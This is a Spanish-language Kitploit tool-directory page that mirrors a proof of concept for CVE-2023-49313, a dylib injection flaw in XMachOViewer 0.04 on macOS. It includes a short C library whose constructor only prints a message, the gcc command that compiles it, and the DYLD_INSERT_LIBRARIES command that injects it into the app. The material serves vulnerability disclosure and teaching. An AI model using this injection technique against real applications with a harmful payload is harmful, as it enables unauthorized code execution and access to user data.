Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-49313 — Una vulnerabilidad de inyección dylib en XMachOViewer 0.04 permite a los atacantes comprometer la integridad. Al explotar esto, se puede inyectar código no autorizado en los procesos del producto, lo que potencialmente conduce al control remoto y al acceso no autorizado a datos sensibles del usuario. | Kitploit
Herramientas/GitHubGitHub/louiselalanne/cve-2023-49313
ExplotaciónAprendizaje y EducaciónDesarrollo de PayloadsExplotación de Binarios
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Una vulnerabilidad de inyección dylib en XMachOViewer 0.04 permite a los atacantes comprometer la integridad. Al explotar esto, se puede inyectar código no autorizado en los procesos del producto, lo que potencialmente conduce al control remoto y al acceso no autorizado a datos sensibles del usuario.

4hace 2 añosAún no revisado
Compartir

CVE-2023-49313

Una vulnerabilidad de inyección de dylib en XMachOViewer 0.04 permite a los atacantes comprometer la integridad. Al explotarla, se puede inyectar código no autorizado en los procesos del producto, lo que potencialmente conduce al control remoto y al acceso no autorizado a datos sensibles del usuario.

Captura de pantalla 2023-11-27 a las 20 06 48

Versión portátil para macOS

  • Primero escribiremos el dylib
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • Compilar gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • E inyectarlo: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

Esto abrirá la aplicación y ejecutará el dylib. Después de cerrar la aplicación, lo veremos en el terminal:

Captura de pantalla 2023-11-27 a las 19 52 57

  • Puedes estudiar y entender más sobre el tema en: https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
Descargar herramienta